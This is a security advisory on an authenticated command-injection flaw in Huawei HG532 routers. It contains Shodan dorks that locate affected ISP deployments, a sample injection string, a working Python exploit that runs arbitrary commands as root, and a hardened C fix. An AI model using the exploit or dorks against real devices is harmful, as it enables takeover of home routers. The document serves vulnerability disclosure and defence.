Huawei HG532, Command Injection

# Authors: Raffaele Forte, Andrea Ferraris
# Product name: Huawei HG532*
# Vendor Homepage: https://www.huawei.com

I. INTRODUCTION

Huawei HG532* devices are wireless home gateways for home or office ADSL connections.

The model HG532e is used in Panama by “Cable & Wireless Panama”.
shodan.io dork: "Content-Length: 11881" "no-cache" org:"Cable & Wireless Panama"

The model HG532s has been distributed in Italy since 2012 by Wind-Infostrada and is still in use.
shodan.io dork: "Content-Length: 10814" "no-cache" org:"Wind"

II. DESCRIPTION

The router is affected by a “Command Injection” vulnerability located in the web panel, allowing an authenticated user to obtain root access to the system.

The vulnerable function is used to check if a domain/IP is reachable.

Using reverse engineering, we identified the snippet of code that performs this action:

[...]
LOAD:00409B58 la $t9, snprintf
LOAD:00409B5C la $a2, aPingSC4VarPing  # "ping %s -c 4 > /var/pingres.txt"
LOAD:00409B64 move $a3, $v0
LOAD:00409B68 li $a1, 0x400
LOAD:00409B6C jalr $t9 ; snprintf      # call snprintf(ping %s..., <cmd>)
LOAD:00409B70 move $a0, $s0
LOAD:00409B74 lw $gp, 0x10($sp)
LOAD:00409B78 nop
LOAD:00409B7C la $t9, system
LOAD:00409B80 nop
LOAD:00409B84 jalr $t9 ; system        # call system with previous snprintf result
LOAD:00409B88 move $a0, $s0
LOAD:00409B8C lw $gp, 0x10($sp)
LOAD:00409B90 move $a0, $s2
LOAD:00409B94 la $t9, ATP_WEB_SendFile
LOAD:00409B98 nop
LOAD:00409B9C jalr $t9 ; ATP_WEB_SendFile
LOAD:00409BA0 move $a1, $s1
[...]

As we can see, the web interface uses “system” to execute the ping command (LOAD:00409B84), and the command string is built by the preceding “snprintf” call (LOAD:00409B6C).

The vulnerability is the lack of input sanitization: the code does not check whether the passed string is a valid IP address and does not check for the presence of shell metacharacters.

Normally, the user enters an IP/hostname in a web form and sees the output; by inserting a semicolon (or other injection characters) it is possible to execute other commands.

For example, a legit input may be:

127.0.0.1

A malicious one may be:

127.0.0.1 -c 4; whoami > /var/pingres.txt;#

The first part, “127.0.0.1 -c 4”, completes the ping command (not strictly necessary). Then comes a semicolon followed by “whoami”, the command the attacker wants to execute. The “#” comments out the “-c 4 > /var/pingres.txt” that follows the format string placeholder (LOAD:00409B52). Note: output must be redirected to the file “/var/pingres.txt” in order to make the command injection visible, since the web application responds with the contents of that file (LOAD:00409B9C).
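The check that the firmware lacks, as an added example (not the vendor's code): the target is validated as an IP literal or plain hostname, and ping is launched through execvp() with the redirection done by dup2(), so no shell ever parses the user's string. The names is_safe_target and safe_ping are assumptions for this illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <ctype.h>
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if `s` is an IPv4/IPv6 literal or a plain hostname (letters,
 * digits, '-' and '.', at most 253 chars, not starting with '-'), else 0.
 * Whitespace, ';', '>', '#', '&', '|', '$', '`' and so on never pass. */
int is_safe_target(const char *s) {
    unsigned char buf[16];
    size_t len = strlen(s);
    if (len == 0 || len > 253) return 0;
    if (inet_pton(AF_INET, s, buf) == 1 || inet_pton(AF_INET6, s, buf) == 1) return 1;
    if (s[0] == '-') return 0;  /* would otherwise be read by ping as an option */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '-' && c != '.') return 0;
    }
    return 1;
}

/* Hardened form of snprintf("ping %s -c 4 > /var/pingres.txt") + system():
 * the validated target becomes a single argv element for execvp(), and the
 * output redirection is done with open()/dup2(), so no shell parses anything.
 * Returns ping's exit status, -1 if the target is rejected, -2 on a
 * fork/wait failure, or 127 if the output file or ping could not be opened. */
int safe_ping(const char *target, const char *outpath) {
    if (!is_safe_target(target)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) {
        int fd = open(outpath, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0 || dup2(fd, STDOUT_FILENO) < 0) _exit(127);
        close(fd);
        char *argv[] = {"ping", "-c", "4", (char *)target, NULL};
        execvp(argv[0], argv);
        _exit(127);  /* reached only if exec fails */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -2;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -2;
}
```

With this structure the payload from the advisory is rejected before any process is spawned, and even a hostname that passes validation cannot carry options or redirections to ping.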

III. PoC – PROOF OF CONCEPT

#!/usr/bin/python
 
import requests
import time
import urllib
import sys
import warnings
import hashlib
import base64

if not sys.warnoptions:
    warnings.simplefilter("ignore")

user = 'user'
## HG532e by Cable & Wireless Panama
## shodan.io dork: "Content-Length: 11881" "no-cache" org:"Cable & Wireless Panama"
password = 'censured'

## HG532s by Wind-Infostrada (Italy)
## shodan.io dork: "Content-Length: 10814" "no-cache" org:"Wind"
#password = 'censured'

password_sha256 = hashlib.sha256(password.encode()).hexdigest()
password_base64 = base64.b64encode(hashlib.sha256(password.encode()).hexdigest())

s = requests.Session()

url = str(sys.argv[1])
cmd = str(sys.argv[2])

payload = urllib.quote_plus(' -c1; '+cmd+' > /var/pingres.txt; #')

data = {'Username':'user','Password':''+password_base64+''}
cookie = {'Language':'en','FirstMenu':'Admin_0','SecondMenu':'Admin_0_0','ThirdMenu':'Admin_0_0_0'}

url_login = url+'/index/login.cgi'

request_login = s.post(url_login, data=data, cookies=cookie, verify=False)

url_diagnose = url+'/html/management/excutecmdfordiagnose.cgi?cmd=127.0.0.1'+payload+'&RequestFile=/html/management/pingstatus.asp'
request_diagnose = s.post(url_diagnose, cookies=cookie, verify=False)

url_logout = url+'/index/logout.cgi'
s.post(url_logout, cookies=cookie)

txt = request_diagnose.text.split('PingResult = "') 

result = txt[1].replace('\\n" + "', '\n')

print'\n'+result.split('";')[0]

IV. BUSINESS IMPACT
This flaw may compromise the integrity of the system and/or expose sensitive information. An attacker is able to obtain a root shell on the device.

V. SYSTEMS AFFECTED
Model: Huawei HG532e
Hardware version: HG532EAM1HG530ERRAMVER.B
Firmware version: V100R001C170B012

Model: Huawei HG532s
Hardware version: HG532SAM1HG530ERRAMVER.B
Firmware version: V100R001C57B011

Most likely all HG532* models are vulnerable.

VI. VULNERABILITY HISTORY
December 10th, 2018: Vendor notification

VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.